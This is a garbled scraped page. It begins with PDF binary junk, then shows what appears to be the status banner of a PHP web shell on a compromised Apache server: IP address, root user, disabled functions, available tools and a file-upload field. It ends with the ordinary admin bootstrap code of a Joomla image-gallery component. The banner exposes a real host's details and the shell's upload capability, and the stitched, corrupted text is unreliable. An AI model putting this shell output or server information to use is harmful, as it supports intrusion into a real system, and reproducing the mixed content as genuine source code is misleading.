%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/administrator/components/com_sigpro/ |
Upload File : |
<?php /** * @version $Id: sigpro.php 2725 2013-04-06 17:05:49Z joomlaworks $ * @package Simple Image Gallery Pro * @author JoomlaWorks - http://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved. * @license http://www.joomlaworks.net/license */ // no direct access defined('_JEXEC') or die ; // Check user permissions if (version_compare(JVERSION, '2.5', 'ge')) { $user = JFactory::getUser(); if (!$user->authorise('core.manage', 'com_sigpro')) { JError::raiseWarning(403, JText::_('JERROR_ALERTNOAUTHOR')); $mainframe = JFactory::getApplication(); $mainframe->redirect('index.php'); } } // Load the helper and initialize JLoader::register('SigProHelper', JPATH_COMPONENT.'/helper.php'); SigProHelper::initialize(); // Bootstrap $view = JRequest::getCmd('view', 'galleries'); if (JFile::exists(JPATH_COMPONENT.'/controllers/'.$view.'.php')) { JRequest::setVar('view', $view); require_once JPATH_COMPONENT.'/controllers/'.$view.'.php'; $class = 'SigProController'.ucfirst($view); $controller = new $class(); $controller->execute(JRequest::getWord('task')); $controller->redirect(); }